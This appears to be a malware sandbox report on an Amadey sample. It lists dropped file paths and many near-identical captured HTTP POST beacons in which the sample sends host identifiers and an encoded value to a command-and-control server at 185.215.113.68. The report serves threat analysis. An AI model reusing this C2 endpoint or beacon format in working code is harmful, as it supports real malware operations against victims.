Jan 18, 2024 00:34:57.225277901 CET	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 17 Jan 2024 23:34:57 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report SecuriteInfo.com.Win32.PWSX-gen.24221.17365.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Amadey

Yara Signatures

PCAP (Network Traffic)

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\MPGPH131\MPGPH131.exe

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_RegAsm.exe_9ae6cbaf345627d11f56e4aa45ad7edf1ce7c4_be6a5693_41b6c198-e683-45b2-a099-31bff24d2b12\Report.wer

C:\ProgramData\Microsoft\Windows\WER\Temp\WER8201.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WERA559.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WERA942.tmp.xml

C:\ProgramData\Mozilla-1de4eec8-1241-4177-a864-e594e8d1fb38\uninstall_ping_308046B0AF4A39CB_14b615bc-a80e-4e59-977b-201c3e8ea9da.json (copy)

C:\ProgramData\Mozilla-1de4eec8-1241-4177-a864-e594e8d1fb38\uninstall_ping_308046B0AF4A39CB_14b615bc-a80e-4e59-977b-201c3e8ea9da.json.tmp

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\MPGPH131.exe.log

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\RageMP131.exe.log

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\SecuriteInfo.com.Win32.PWSX-gen.24221.17365.exe.log

Windows Analysis Report
SecuriteInfo.com.Win32.PWSX-gen.24221.17365.exe

Timestamp	Bytes transferred	Direction	Data
Jan 18, 2024 00:35:00.132291079 CET	181	OUT	POST /theme/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.68 Content-Length: 31 Cache-Control: no-cache Data Raw: 65 31 3d 31 30 30 30 34 30 30 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: e1=1000400001&unit=246122658369
Jan 18, 2024 00:35:00.373591900 CET	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 17 Jan 2024 23:35:00 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0

Timestamp	Bytes transferred	Direction	Data
Jan 18, 2024 00:35:00.737051010 CET	153	OUT	POST /theme/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.68 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jan 18, 2024 00:35:00.970743895 CET	191	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 17 Jan 2024 23:35:00 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 32 0d 0a 20 33 0d 0a 30 0d 0a 0d 0a Data Ascii: 2 30
Jan 18, 2024 00:35:00.976567030 CET	311	OUT	POST /theme/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.68 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 39 38 34 42 34 45 46 41 38 42 37 43 39 37 39 39 31 34 33 34 41 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 41 42 34 32 44 37 38 42 34 35 45 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58984B4EFA8B7C97991434AB140BE1D46450FC9DDF642E3BDD70A7AB42D78B45E82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Jan 18, 2024 00:35:01.216856003 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 17 Jan 2024 23:35:01 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Timestamp	Bytes transferred	Direction	Data
Jan 18, 2024 00:35:01.569689035 CET	153	OUT	POST /theme/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.68 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jan 18, 2024 00:35:01.805355072 CET	191	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 17 Jan 2024 23:35:01 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 32 0d 0a 20 33 0d 0a 30 0d 0a 0d 0a Data Ascii: 2 30
Jan 18, 2024 00:35:01.813803911 CET	311	OUT	POST /theme/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.68 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 39 38 34 42 34 45 46 41 38 42 37 43 39 37 39 39 31 34 33 34 41 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 41 42 34 32 44 37 38 42 34 35 45 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58984B4EFA8B7C97991434AB140BE1D46450FC9DDF642E3BDD70A7AB42D78B45E82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Jan 18, 2024 00:35:02.050910950 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 17 Jan 2024 23:35:01 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Timestamp	Bytes transferred	Direction	Data
Jan 18, 2024 00:35:02.398575068 CET	153	OUT	POST /theme/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.68 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jan 18, 2024 00:35:02.632318974 CET	191	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 17 Jan 2024 23:35:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 32 0d 0a 20 33 0d 0a 30 0d 0a 0d 0a Data Ascii: 2 30
Jan 18, 2024 00:35:02.633955956 CET	311	OUT	POST /theme/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.68 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 39 38 34 42 34 45 46 41 38 42 37 43 39 37 39 39 31 34 33 34 41 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 41 42 34 32 44 37 38 42 34 35 45 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58984B4EFA8B7C97991434AB140BE1D46450FC9DDF642E3BDD70A7AB42D78B45E82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Jan 18, 2024 00:35:02.876138926 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 17 Jan 2024 23:35:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Timestamp	Bytes transferred	Direction	Data
Jan 18, 2024 00:35:03.265366077 CET	153	OUT	POST /theme/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.68 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jan 18, 2024 00:35:03.507186890 CET	191	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 17 Jan 2024 23:35:03 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 32 0d 0a 20 33 0d 0a 30 0d 0a 0d 0a Data Ascii: 2 30
Jan 18, 2024 00:35:03.508344889 CET	311	OUT	POST /theme/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.68 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 39 38 34 42 34 45 46 41 38 42 37 43 39 37 39 39 31 34 33 34 41 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 41 42 34 32 44 37 38 42 34 35 45 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58984B4EFA8B7C97991434AB140BE1D46450FC9DDF642E3BDD70A7AB42D78B45E82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Jan 18, 2024 00:35:03.753047943 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 17 Jan 2024 23:35:03 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Timestamp	Bytes transferred	Direction	Data
Jan 18, 2024 00:35:05.163772106 CET	153	OUT	POST /theme/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.68 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jan 18, 2024 00:35:05.398710012 CET	191	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 17 Jan 2024 23:35:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 32 0d 0a 20 33 0d 0a 30 0d 0a 0d 0a Data Ascii: 2 30
Jan 18, 2024 00:35:05.399872065 CET	311	OUT	POST /theme/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.68 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 39 38 34 42 34 45 46 41 38 42 37 43 39 37 39 39 31 34 33 34 41 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 41 42 34 32 44 37 38 42 34 35 45 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58984B4EFA8B7C97991434AB140BE1D46450FC9DDF642E3BDD70A7AB42D78B45E82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Jan 18, 2024 00:35:05.638927937 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 17 Jan 2024 23:35:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Timestamp	Bytes transferred	Direction	Data
Jan 18, 2024 00:35:06.030123949 CET	153	OUT	POST /theme/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.68 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jan 18, 2024 00:35:06.261567116 CET	191	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 17 Jan 2024 23:35:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 32 0d 0a 20 33 0d 0a 30 0d 0a 0d 0a Data Ascii: 2 30
Jan 18, 2024 00:35:06.267286062 CET	311	OUT	POST /theme/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.68 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 39 38 34 42 34 45 46 41 38 42 37 43 39 37 39 39 31 34 33 34 41 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 41 42 34 32 44 37 38 42 34 35 45 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58984B4EFA8B7C97991434AB140BE1D46450FC9DDF642E3BDD70A7AB42D78B45E82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Jan 18, 2024 00:35:06.503110886 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 17 Jan 2024 23:35:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Timestamp	Bytes transferred	Direction	Data
Jan 18, 2024 00:35:06.856842995 CET	153	OUT	POST /theme/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.68 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jan 18, 2024 00:35:07.097268105 CET	191	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 17 Jan 2024 23:35:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 32 0d 0a 20 33 0d 0a 30 0d 0a 0d 0a Data Ascii: 2 30
Jan 18, 2024 00:35:07.106020927 CET	311	OUT	POST /theme/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.68 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 39 38 34 42 34 45 46 41 38 42 37 43 39 37 39 39 31 34 33 34 41 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 41 42 34 32 44 37 38 42 34 35 45 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58984B4EFA8B7C97991434AB140BE1D46450FC9DDF642E3BDD70A7AB42D78B45E82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Jan 18, 2024 00:35:07.348687887 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 17 Jan 2024 23:35:07 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Timestamp	Bytes transferred	Direction	Data
Jan 18, 2024 00:35:07.715429068 CET	153	OUT	POST /theme/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.68 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jan 18, 2024 00:35:07.949820042 CET	191	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 17 Jan 2024 23:35:07 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 32 0d 0a 20 33 0d 0a 30 0d 0a 0d 0a Data Ascii: 2 30
Jan 18, 2024 00:35:07.950767040 CET	311	OUT	POST /theme/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.68 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 39 38 34 42 34 45 46 41 38 42 37 43 39 37 39 39 31 34 33 34 41 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 41 42 34 32 44 37 38 42 34 35 45 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58984B4EFA8B7C97991434AB140BE1D46450FC9DDF642E3BDD70A7AB42D78B45E82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Jan 18, 2024 00:35:08.190100908 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 17 Jan 2024 23:35:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Timestamp	Bytes transferred	Direction	Data
Jan 18, 2024 00:35:08.547122955 CET	153	OUT	POST /theme/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.68 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jan 18, 2024 00:35:08.787763119 CET	191	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 17 Jan 2024 23:35:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 32 0d 0a 20 33 0d 0a 30 0d 0a 0d 0a Data Ascii: 2 30
Jan 18, 2024 00:35:08.788845062 CET	311	OUT	POST /theme/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.68 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 39 38 34 42 34 45 46 41 38 42 37 43 39 37 39 39 31 34 33 34 41 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 41 42 34 32 44 37 38 42 34 35 45 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58984B4EFA8B7C97991434AB140BE1D46450FC9DDF642E3BDD70A7AB42D78B45E82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Jan 18, 2024 00:35:09.031049967 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 17 Jan 2024 23:35:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0